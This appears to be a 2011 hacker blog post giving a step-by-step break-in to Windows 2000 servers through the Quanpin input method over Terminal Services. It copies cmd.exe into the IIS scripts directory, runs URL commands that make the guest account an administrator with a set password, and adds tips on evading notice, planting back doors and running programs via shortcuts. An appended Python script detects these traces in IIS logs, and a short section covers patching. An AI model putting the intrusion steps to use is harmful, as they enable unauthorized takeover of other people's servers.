Friday, 11 November 2011

Complete notes and questions on the input method vulnerability

Because of Microsoft's irresponsible attitude towards its Chinese products, Windows 2000 servers with Terminal Services and the Quanpin (full pinyin) input method installed (^^ I have only succeeded with Quanpin) have a serious vulnerability that allows remote login and obtaining superuser privileges.
After many twists and turns, much trembling, and many attempts, this little lady finally understood the reason behind it: without uploading any file at all, one can break in and install a back door (back doors are all the rage these days ^^).
The process is as follows:

1. Scan for port 3389 (the Terminal Services default);
2. Connect with the Terminal Services client program;
3. Press Ctrl+Shift to bring up the Quanpin input method (others don't seem to work), right-click (if its Help menu is greyed out, move on to the next host quickly, as this one has been patched), click Help, then click "Input Method Basics";
4. In the "Options" menu, right-click ---> "Jump to URL", and enter: c:\winnt\system32\cmd.exe (if you are unsure of the NT system directory, enter c:\ or d:\ ... and look for it);
5. Choose "Save to disk" and choose the directory c:\inetpub\scripts\; since this is really just a copy of a file already on the remote server, the operation finishes very quickly;
6. Open IE and enter: http://ip/scripts/cmd.exe?/c dir   How about that? There's the cmd.exe file, right? With this the first step is done;
7. http://ip/scripts/cmd.exe?/c echo net user guest /active:yes>go.bat
8. http://ip/scripts/cmd.exe?/c echo net user guest elise>>go.bat
9. http://ip/scripts/cmd.exe?/c echo net localgroup administrators /add guest>>go.bat
10. http://ip/scripts/cmd.exe?/c type go.bat   Check that the contents of our batch file are as follows:

net user guest /active:yes
net user guest elise
net localgroup administrators /add guest

11. In the "Options" menu, right-click ---> "Jump to URL", enter: c:\inetpub\scripts\go.bat ---> it executes at the current location on disk;
12. Heh, all done! We have activated the server's guest account with the password elise, and it is a superuser! (I prefer guest to creating a new account; it seems less likely to be noticed.) Now you can connect over IPC$ and do whatever you like; of course you can also log in to his server directly as guest and go dance on his machine :)

Notes:
1. When you log in to his server with the Terminal Services client, none of your actions show up on his machine, but if he happens to have Terminal Services Manager open, you're in trouble :( He can then see the process IDs and program images you have opened, your IP and machine name, and he can send you messages!
2. Connecting increases the load on the remote server and very easily causes it to hang or drop the connection, so it is best to work quickly; this little lady has wasted no end of connection fees and effort on this.
3. Set up the back door as soon as possible and don't upload any programs for now, first to avoid disconnection and second to keep the other side from patching! This little lady lost out this way once: a Trojan upload was interrupted and never finished, and the next day they had patched and I could never get back in! And it left behind xxxx ... :(

Personal opinion:
1. Under IE you only have IUSR_machine privileges, so don't expect to do anything beyond them, such as starting telnet, Trojans, and so on;
2. Under the URL jump you have superuser privileges; make good use of it :)
3. Whichever directory you jump to, you can usually only view and execute files in the current directory and cannot enter subdirectories; if you want to go in, jump again! :)
4. This method seems to be unaffected by the other side's firewall!

How to plug the hole:
1. Apply the patch;
2. Remove the Quanpin input method; the standard one is enough ^^;
3. Stop it in Services: Terminal Services, service name TermService, program name system32\termsrv.exe. (If one day you sneak into a server and find the termsrv.exe file but cannot detect port 3389, you know what to do, right? ^^)
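Added example (not part of the original post): a Python script an administrator could run to spot the traces the procedure above leaves on an IIS host, namely requests to a copied cmd.exe under /scripts/ in the W3C-format web log (steps 6 to 10) and the dropped cmd.exe and go.bat sitting in inetpub\scripts (step 5). The log lines and the directory contents are constructed for this example, and the regular expression and helper names are my own, not anything from the original write-up.

```python
"""Detect the two artefacts the write-up leaves on a web server:
   1. web requests that execute a copy of cmd.exe in the IIS /scripts/ directory,
   2. the copied shell (cmd.exe) or batch file (go.bat) present in that directory.
All sample data below is constructed for this example."""
import os
import re
import tempfile
from urllib.parse import unquote

# Constructed sample log in IIS W3C extended format:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2011-11-11 10:00:01 10.0.0.5 GET /default.htm - 200
2011-11-11 10:00:07 10.0.0.9 GET /scripts/cmd.exe /c+dir 200
2011-11-11 10:00:12 10.0.0.9 GET /scripts/cmd.exe /c+echo+net+user+guest+/active:yes>go.bat 200
2011-11-11 10:00:20 10.0.0.9 GET /scripts/cmd.exe /c+type+go.bat 200
2011-11-11 10:01:03 10.0.0.5 GET /images/logo.gif - 304
"""

# A request whose URI stem is an executable or batch file under /scripts/ is the
# signature of the technique; cmd.exe is the case the write-up uses.
SUSPECT_STEM = re.compile(r"^/scripts/[^/]+\.(exe|bat|cmd|com)$", re.IGNORECASE)


def parse_iis_line(line):
    """Split one W3C log line into a dict; return None for directives and blanks."""
    if not line.strip() or line.startswith("#"):
        return None
    fields = line.split()
    if len(fields) != 7:
        return None
    date, time, ip, method, stem, query, status = fields
    # IIS encodes spaces in the query as '+'; decode so the command reads naturally.
    return {"date": date, "time": time, "ip": ip, "method": method,
            "stem": stem, "query": unquote(query.replace("+", " ")),
            "status": int(status)}


def find_cmd_abuse(log_text):
    """Return (client ip, uri stem, decoded query) for every request that ran a copied shell."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_iis_line(line)
        if rec and SUSPECT_STEM.match(rec["stem"]):
            hits.append((rec["ip"], rec["stem"], rec["query"]))
    return hits


def find_dropped_binaries(scripts_dir):
    """Return the names of shell or batch files present in the IIS scripts directory."""
    bad_ext = (".exe", ".bat", ".cmd", ".com")
    return sorted(n for n in os.listdir(scripts_dir) if n.lower().endswith(bad_ext))


def demo_scripts_dir():
    """Build a throwaway 'scripts' directory holding the two files the write-up drops
    plus one legitimate-looking ISAPI extension (constructed contents)."""
    d = tempfile.mkdtemp()
    for name in ("cmd.exe", "go.bat", "legit.dll"):
        with open(os.path.join(d, name), "w") as f:
            f.write("placeholder\n")
    return d


if __name__ == "__main__":
    for ip, stem, query in find_cmd_abuse(SAMPLE_LOG):
        print(f"ALERT {ip} executed {stem} with: {query}")
    print("dropped files in scripts dir:", find_dropped_binaries(demo_scripts_dir()))
```

On a real server point find_dropped_binaries at the actual inetpub\scripts path and feed find_cmd_abuse the day's W3C log; a hit on either is a strong sign the server has been worked over in exactly the way described above.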

Questions (experts, please advise):
1. What if the www access under IE requires a password?
2. What if the other side does not run a www service? I tried jumping directly to the URL net user hack elise /add, and it did not work!
3. If the other side's port 139 is closed, is there any way to open it? How is port 139 controlled on a w2k server?
Answers:
1. Jump to URL: \winnt\system32 (the system directory is already shown in the "Jump to URL" dialog!!)
2. Select the net.exe file, right-click ---> Create Shortcut ---> right-click the shortcut ---> append to the shortcut's target: user guest /active:yes . The rest needs no explanation :)
This method sidesteps both my questions 1 and 2!!!
Conclusions:
1. Although you can run programs, you cannot see them, so for interactive programs such as regedt32 or notepad you will need another approach :)
2. Shortcuts are a good way to execute programs.
PS. The answer to my third question, about port 139, seems to be here:
I logged in to the other side's server as guest and opened the dial-up networking properties, and hey, I found that File and Printer Sharing and Client for Microsoft Networks were not checked!!! He was lazy, so I checked them for him :) But he has to redial for it to take effect! I don't know whether his 139 opened after that; I had no time to wait for him to redial. (If you try to disconnect his dial-up it gives an error, because I tried ;p)
